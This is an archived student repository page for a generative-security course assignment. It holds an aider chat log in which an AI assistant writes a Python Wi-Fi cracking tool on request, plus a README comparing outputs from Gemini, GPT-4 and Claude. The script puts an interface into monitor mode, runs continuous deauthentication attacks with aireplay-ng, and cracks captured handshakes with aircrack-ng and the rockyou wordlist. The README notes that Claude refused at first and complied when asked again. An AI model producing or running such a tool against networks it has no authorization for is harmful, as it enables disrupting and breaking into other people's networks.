This repository has been archived on 2025-04-28. You can view files and clone it, but cannot push or open issues or pull requests.
gensec-westgate-djw2/hw7
David Westgate 293d8be4b9 aider: Implemented wifi penetration testing application.
# Aider chat conversation:

USER: Generate a python application to assist in wifi penetration testing by prompting the user for the name (SSID) of a password protected wifi network and returning the plaintext password.

This python application should use a combination of shell tools assumed to be on the users linux system, including but not limited to iwconfig, airmon-ng, airodump-ng, aireplay-ng, aircrack-ng.

Operations may be run sequentially, or in parallel using multi-threading

As needed, the use of shell tools should utilize sudo capabilities

As needed, the application may utilize a wordlist found at ~/rockyou.txt

As needed, the application can change the state of the users wifi interface between managed and monitor mode

Save this to hw7/gemini/app.py

ASSISTANT: ```python
hw7/gemini/app.py
<<<<<<< SEARCH
=======
import subprocess
import re
import time

def change_to_monitor_mode(interface):
    """Changes the given interface to monitor mode."""
    subprocess.run(["sudo", "airmon-ng", "start", interface])

def change_to_managed_mode(interface):
    """Changes the given interface to managed mode."""
    subprocess.run(["sudo", "airmon-ng", "stop", interface])

def get_wifi_interfaces():
    """Returns a list of available wifi interfaces."""
    output = subprocess.run(["iwconfig"], capture_output=True).stdout.decode()
    interfaces = re.findall(r"(\w+)\s+IEEE", output)
    return interfaces

def get_target_network(interfaces):
    """Prompts the user to choose a target network from a list of scanned networks."""
    print("Scanning for networks...")
    process = subprocess.Popen(["sudo", "airodump-ng", "--band", "bg", "-w", "scan", interfaces[0]], stdout=subprocess.PIPE)
    time.sleep(5)  # Scan for a few seconds
    process.terminate()
    output = process.communicate()[0].decode()
    networks = re.findall(r"(\s+)([0-9A-F]{2}:[0-9A-F]{2}:[0-9A-F]{2}:[0-9A-F]{2}:[0-9A-F]{2}:[0-9A-F]{2})\s+(-[0-9]+)\s+([0-9]+)\s+([0-9]+)\s+([0-9]+)\s+(-\w+)\s+([0-9]+)\s+([0-9]+)\s+([0-9]+)\s+(.*)", output)
    if networks:
        print("Available networks:")
        for i, network in enumerate(networks):
            print(f"{i+1}. {network[-1]} (BSSID: {network[1]})")
        choice = int(input("Choose target network: ")) - 1
        return networks[choice]
    else:
        print("No networks found.")
        return None

def capture_handshake(target_network, interface):
    """Captures the handshake of the target network."""
    bssid = target_network[1]
    channel = target_network[3]
    subprocess.Popen(["sudo", "airodump-ng", "--bssid", bssid, "--channel", channel, "--write", "capture", interface], stdout=subprocess.DEVNULL)
    print(f"Capturing handshake for {target_network[-1]} (BSSID: {bssid})...")
    try:
        while True:
            subprocess.run(["sudo", "aireplay-ng", "--deauth", "0", "-a", bssid, interface])
            time.sleep(5)
    except KeyboardInterrupt:
        print("Handshake capture stopped.")

def crack_password(capture_file, wordlist):
    """Cracks the password of the captured handshake using the given wordlist."""
    print("Cracking password...")
    try:
        output = subprocess.run(["sudo", "aircrack-ng", "-w", wordlist, capture_file], capture_output=True).stdout.decode()
        password = re.search(r"KEY FOUND!\s+\[(.*)\]", output)
        if password:
            return password.group(1)
        else:
            return None
    except FileNotFoundError:
        print(f"Wordlist not found: {wordlist}")
        return None

if __name__ == "__main__":
    interfaces = get_wifi_interfaces()
    if interfaces:
        interface = interfaces[0]  # Use the first interface for now
        change_to_monitor_mode(interface)
        target_network = get_target_network(interfaces)
        if target_network:
            capture_handshake(target_network, interface)
            password = crack_password("capture-01.cap", "~/rockyou.txt")
            if password:
                print(f"Password found: {password}")
            else:
                print("Password not found.")
        change_to_managed_mode(interface)
    else:
        print("No wifi interfaces found.")
>>>>>>> REPLACE
```
2024-05-30 14:38:12 -07:00
..
claude reset apps 2024-05-30 14:36:40 -07:00
gemini aider: Implemented wifi penetration testing application. 2024-05-30 14:38:12 -07:00
gpt4 reset apps 2024-05-30 14:36:40 -07:00
README.md add photos, update readme 2024-05-30 14:20:14 -07:00
screencast_url.txt initial commit for hw7 2024-05-27 10:53:13 -07:00

David Westgate 31 May 2024

HW7 for gensec

The purpose of this assignment is to generate a security related application using aider. The application I will attempt to generate is a wifi penetration testing python. The intention is that this application will be able to perform the same wifi cracking that my hw6 LLM application did.

Input

Generate a python application to assist in wifi penetration testing by prompting the user for the name of a password protected wifi network BSSID and returning the plaintext password. 

This python application should use a combination of shell tools assumed to be on the users linux system, including but not limited to iwconfig, airmon-ng, airodump-ng, aireplay-ng, aircrack-ng. 

Operations may be run sequentially, or in parallel using multi-threading

As needed, the use of shell tools should utilize sudo capabilities

As needed, the application can change the state of the users wifi interface between managed and monitor mode

Save this to hw7/{llm}/app.py

Output - Gemini (gemini 1.5)

There were a few runs of errors, but eventually I was able to get aider to output a program with the gemini LLM

Errors

On the run where code was finally output, we still saw errors. But, we will ignore these for now

error0 error1

Code output

gemini/app.py

Analysis

Output - GPT4 (gpt40)

A script was generated here on the first try

Errors

Similarly, the code also generated with lint errors, and when prompted, I instructed airder to fix them. However, it did come up with a program on the first try error0 error1

Code output

gpt4/app.py

Analysis

Output - Claude (claude-opus)

I was able to redeem $5 of free API credits for this test

Errors

On the first shot, claude rejected this ask. On the second try, it gave a program with a nice summary error0 summary

Code output

claude/app.py

Analysis